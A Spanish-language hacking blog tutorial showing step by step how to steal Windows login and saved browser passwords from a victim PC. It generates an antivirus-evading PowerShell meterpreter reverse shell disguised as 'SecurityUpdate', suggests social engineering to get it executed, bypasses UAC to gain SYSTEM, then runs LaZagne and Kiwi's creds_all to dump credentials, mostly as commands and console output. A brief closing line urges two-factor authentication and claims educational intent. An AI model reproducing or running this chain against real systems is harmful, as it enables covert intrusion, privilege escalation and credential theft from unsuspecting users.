Hace un tiempo que no publicaba artículos de Hacking, pero arrancamos nuevamente con ellos. Hoy vamos a ver como podemos obtener contraseñas de Login de un equipo Windows, y las demás utilizadas en el equipo. Para esto vamos vamos a utilizar Veil-Evasion y Metasploit.
Ambiente:
PC con Windows 10.0.0.8
Kali Linux 10.0.0.9
Lo primero es que vamos a crear un pequeño script PowerShell que son bastante efectivos ya que no disparan el antivirus y lo vamos a crear con Veil-Evasion
En Caso de que no cuente con Veil-Evasion, lo pueden clonar.
$ git clone https://github.com/Veil-Framework/Veil-Evasion
Acceden a la carpeta y ejecutan Veil-Evasion.py
$ ./Veil-Evasion.py
Ejecutamos list y tendremos una lista de Payloads.
[menu>>]: list
Vamos a Elejir el 20
20) powershell/meterpreter/rev_http
En la Próxima Pantalla simplemente debemos configurar el Host que va a esperar la conexión que en este caso va a ser Kali Linux y ejecutamos generate
[
powershell/meterpreter/rev_http>>]: set LHOST 10.0.0.9
[i] LHOST => 10.0.0.9
[powershell/meterpreter/rev_http>>]: generate
Le damos un Nombre al archivo que va a contener el Payload
[>] Please enter the base name for output files (default is ‘payload’): SecurityUpdate
Ya aquí Veil generará el archivo que llevaremos a la pc Víctima, en nuestro caso simplemente lo vamos a copiar y ejecutar, en caso de un PenTest lo tendríamos que hacer llegar por donde entendamos sea más facil y con algo de ingeniería social hacer que el usuario ejecute el archivo.
Los archivos que nos interesan son:
Payload File: /root/veil-output/source/SecurityUpdate.bat
Handler File: /root/veil-output/handlers/SecurityUpdate_handler.rc
El Payload File es el que vamos a llevar a la PC víctima.
El Handler File lo podemos usar como Source en metasploit para crear el Handler.
Digamos ya copiamos el archivo Payload a nuestra PC Víctima, antes de ejecutarlo vamos a crear el Handler en metasploit para esperar la conexión. Usaremos el Handler File creado por Veil para automatizar las cosas un poco.
root@kali:~/veil-output/handlers# msfconsole -r SecurityUpdate_handler.rc
Ahora tenemos el Handler en espera, vamos a ejecutar el payload en la pc con Windows. Si todo va bien tendremos una sesión en Meterpreter
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
— —- ———– ———-
1 meterpreter x86/win32 Test-PC\Test @ TEST-PC 10.0.0.9:8080 -> 10.0.0.8:63841 (10.0.0.8)
Interactuemos con la Sesión
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: Test-PC\Test
Vamos a intentar obtener las contraseñas usadas por ese usuario, para esto no vamos a auxiliar de LaZagne.
Descarguen LaZagne a su pc con Kali Linux y lo Descomprimen
$ wget https://github.com/AlessandroZ/LaZagne/archive/master.zip
$ unzip master.zip
El ejecutable que nos interesa y el que vamos a subir se encuentra en /LaZagne-master/Windows/standalone/laZagne.exe
Antes de subirlo y lograr nuestro objetivo, necesitamos permisos de administrador. Si ejecutamos getsystem en meterpreter es muy posible que nos de error, Asi que vamos a intentar obtenerlos usando el módulo de bypassuac.
Vamos a salir de la sesión de meterpreter sin cerrarla
meterpreter > background
de vuelta a la consola de Metasploit vamos a correr el módulo que les mencioné
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
Name Current Setting Required Description
—- ————— ——– ———–
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off (Accepted: PSH, EXE)
Exploit target:
Id Name
— —-
0 Windows x86
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > run
[*] Started reverse handler on 10.0.0.9:4444
[*] UAC is Enabled, checking level…
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing…
[+] Part of Administrators group! Continuing…
[*] Uploaded the agent to the filesystem….
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (884270 bytes) to 10.0.0.8
[*] Meterpreter session 2 opened (10.0.0.9:4444 -> 10.0.0.8:63921) at 2015-07-02 02:41:56 -0500
Nos abrirá otra sesión de Meterpreter donde nuevamente intentaremos ejecutar getsystem para obtener los permisos administrativos.
meterpreter > getuid
Server username: Test-PC\Test
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Ya tenemos el máximo Privilegio. Manos a la obra.
Subamos laZagne.exe a nuestra victima.
meterpreter > upload /root/LaZagne-master/Windows/standalone/laZagne.exe c:\\
[*] uploading : /root/LaZagne-master/Windows/standalone/laZagne.exe -> c:\
[*] uploaded : /root/LaZagne-master/Windows/standalone/laZagne.exe -> c:\\laZagne.exe
Si queremos las contraseñas guardadas del usuario, Regresemos a la sesión meterpreter 1 y ejecutemos la herramienta
meterpreter > background
msf> sessions -i 1
meterpreter > shell
Process 4752 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\laZagne.exe all -v
Aqui veremos todas las contraseñas guardadas de los navegadores, y algunas otras.
En el caso de obtener los logins de windows, solo debemos cargar la extensión Kiwi en meterpreter, si buscamos la ayuda veremos los comandos.
Por Alguna razón al actualizar Metasploit, estoy teniendo problemas para obtener las credenciales en texto plano, pero en su caso puede ser diferente, pero solo basta con ejecutar creds_all para obtenerlas todas.
meterpreter > creds_all
En conclusión vieron lo sencillo que es obtener las contraseñas guardadas en los navegadores y algunas aplicaciones, lo mismo para las credenciales de windows, y es que estos los guardan no de la manera más segura. Asi que debemos tener extremo cuidado con lo que ejecutamos en nuestas máquinas y algo que no me canso de recomendar “Autenticación de Doble Factor”.
Este y todos mis artículos de hacking son para Fines educativos, sean buenos.
Fuente: jsitech
